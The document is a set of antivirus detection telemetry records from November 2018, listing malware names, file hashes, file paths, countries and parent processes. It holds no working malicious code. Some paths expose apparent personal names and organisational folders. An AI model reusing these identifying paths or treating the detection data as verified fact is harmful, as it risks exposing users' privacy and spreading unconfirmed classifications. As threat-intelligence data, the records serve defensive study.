  Row(detection=Row(filename='vassalli claudia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\VASSALLI CLAUDIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartusbbackup_v5.0_build_2018070603.exe', filepath='C:\\Users\\X\\Downloads\\nb-driver-64bit-smartusbbackup-5.0-2018070603\\SmartUSBBackup_V5.0_Build_2018070603.exe', filesize=310272000, name='TR/Dropper.Gen.#M300.#R3652'), hash='e4fb190737900187b16d41606bba99b003e6aeb9176f6d299b57f34cf6018ef6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T18:50:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213310-3f67b535', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213310-3F67B535', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:33:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='dfb7afd2eede6af675bbf9bb40c1bdc35f507b9907c8bb595e365da8cbb3abe6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='in_avi.dll', filepath='C:\\program files (x86)\\Winamp\\Plugins\\in_avi.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='b813244f5041b5861ab58d494d576dfb0e35034fa0dc7f78b0032b51863cebc3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:07:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0n0no002205_pfr.rar.exe', filepath='D:\\je me sens mal\\A0n0no002205_pfr.rar.exe', filesize=72000, name='HEUR/AGEN.1028380.#M1.#R1'), hash='cbe8c17d74ba87caeffb5e6f1af1a1c8cbc8dbc0bea47e5335cb05e46963e384', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-01T09:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='H:\\RECYCLER\\RECYCLER\\autorun.exe', filesize=64000, name='DR/PcClient.Gen.#M300.#R5075'), hash='e9bcb3cc0465caa5ab2050374d7d9267b25f231a9e1a83ad83bc2104f3decc6b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Trend Micro\\OfficeScan Client\\Ntrtscan.exe', parentsize=8482000, timestamp='2018-11-01T06:53:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hatches.exe', filepath='F:\\Hatches.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091936-c7a21c27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26ecda22\\AVSCAN-20181101-091328-98BA7CA2\\AVSCAN-20181101-091936-C7A21C27', filesize=2880000, name='W32/Small.L.#M1.#R1'), hash='ed03c464a247b29bd8840a11693dcea8a97c1ab4463408056f4cfe1e7cf37fc8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:19:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='edfcb205ab7fc119363ecc2bff838fef9202ed480f57dff1ebbade65c635613a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EDFCB205AB7FC119363ECC2BFF838FEF9202ED480F57DFF1EBBADE65C635613A', filesize=192000, name='TR/Crypt.XPACK.Gen.#M300.#R1021'), hash='edfcb205ab7fc119363ecc2bff838fef9202ed480f57dff1ebbade65c635613a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:35:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150246-ac4542c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150246-AC4542C5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152526-b0f0cbbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152526-B0F0CBBC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:31:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsq4A3D.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T07:54:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='31d7.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\31D7.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fd03b3fc-1925-282d-e6bd-44da874af9b8.exe', filepath='G:\\{c076a476-0b0d-080f-3499-781bddedba62}\\fd03b3fc-1925-282d-e6bd-44da874af9b8.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='8935de910fb2c7986cef25e88d51a8ddc7c5a3b3f91676ec30030f71682d825d', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1736704, timestamp='2018-11-01T14:16:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdcdc74ea2eb6a78ec473352d02b22104aa68a75d38c710d8cefa70da05e0431', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BDCDC74EA2EB6A78EC473352D02B22104AA68A75D38C710D8CEFA70DA05E0431', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bdcdc74ea2eb6a78ec473352d02b22104aa68a75d38c710d8cefa70da05e0431', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rm30cjh', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RM30CJH', filesize=64000, name='VBA/Dldr.Agent.hgyym.#M1.#R1'), hash='cc0c14f660c2972092b60816431960efcb3ee991bdbdf1d396405b3d49433c51', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122125-fd5b5f73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4d21c5e\\AVSCAN-20181101-122009-EF52849A\\AVSCAN-20181101-122125-FD5B5F73', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:21:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094803-280f5758', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094803-280F5758', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:48:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:54:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00019142', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00019142', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:08:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='trzd745.tmp', filepath='\\\\?\\C:\\Program Files (x86)\\Pledging\\trzD745.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d0a02568bf420ae58133d4123c871202d90509559e77fec64a24db85d4cf0a0', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:17:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130527-fcf882fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130527-FCF882FC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131047-15240dde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131047-15240DDE', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9610323\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:19:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001808-91595cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001808-91595CCE', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:49:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131316-206ba71a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131316-206BA71A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131325-211af249', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131325-211AF249', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135157-33f7b504', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2055eb\\AVSCAN-20181104-134144-E9320359\\AVSCAN-20181104-135157-33F7B504', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221640-43d1b8ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9c2e678\\AVSCAN-20181104-220551-ED207038\\AVSCAN-20181104-221640-43D1B8EE', filesize=756000, name='PUA/SearchProtect.Gen.#M1.#R1'), hash='65b7afa0c263db4e3ff726247d5864ae4463c7618bd9756e486a2c206e97c09f', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:57:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134546-35ccbf7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_31e3b649\\AVSCAN-20181104-134503-2EC41E10\\AVSCAN-20181104-134546-35CCBF7F', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='4f5d72478c0ea865608bea5bc11b1c4fcacf7272a9921e2aa26027d362cd030c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T05:45:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0019655.exe', filepath='K:\\System Volume Information\\_restore{773AF8A0-4C32-4C59-9834-3FB7D6D73C8A}\\RP2\\A0019655.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='43d66a6519a8927de1226c9860065ec399ba6680112fc5c602f02513a0b83090', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:45:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='7d912307219aa4cf74c1050d35871b7a5817186517cfec1cfae19df1b0bcc4ef', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T01:59:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140316-f6ffb81a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140316-F6FFB81A', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205355-83ddcf71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_620a0d2b\\AVSCAN-20181104-205340-812CAB03\\AVSCAN-20181104-205355-83DDCF71', filesize=512000, name='TR/Kryptik.vxbnq.#M1.#R1'), hash='6aebe3252c7ac6a5ebaf908c8e0ffeaa0b0e72759f8b7bedb1f90a4c1b4c1375', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:53:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-09-04-02.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T09:14:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151305-db020cdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-151305-DB020CDD', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:13:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132040-41f88a4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132040-41F88A4C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-083233-18d83e60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de338798\\AVSCAN-20181104-083208-14764443\\AVSCAN-20181104-083233-18D83E60', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:32:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:57:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Music\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T11:55:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00001217', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00001217', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T13:55:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093012-a812d980', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23d9098e\\AVSCAN-20181104-091720-4E8FDD76\\AVSCAN-20181104-093012-A812D980', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:30:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150555-e89b5eb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_165ed2c1\\AVSCAN-20181104-144854-8FAEBCFA\\AVSCAN-20181104-150555-E89B5EB3', filesize=704000, name='TR/Agent.704000.24.#M1.#R1'), hash='63e63fe1292b0a048e1e327c77f618ebac26e62fd3f202a25ffcc12c4c1d2b28', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:05:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d57606edf65c167f4b39521fcc3dacf0207b252940e529b3bf7dd774a2f0dbfb', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D57606EDF65C167F4B39521FCC3DACF0207B252940E529B3BF7DD774A2F0DBFB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d57606edf65c167f4b39521fcc3dacf0207b252940e529b3bf7dd774a2f0dbfb', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:43:11Z'), dt=datetime.date(2018, 11, 4)),
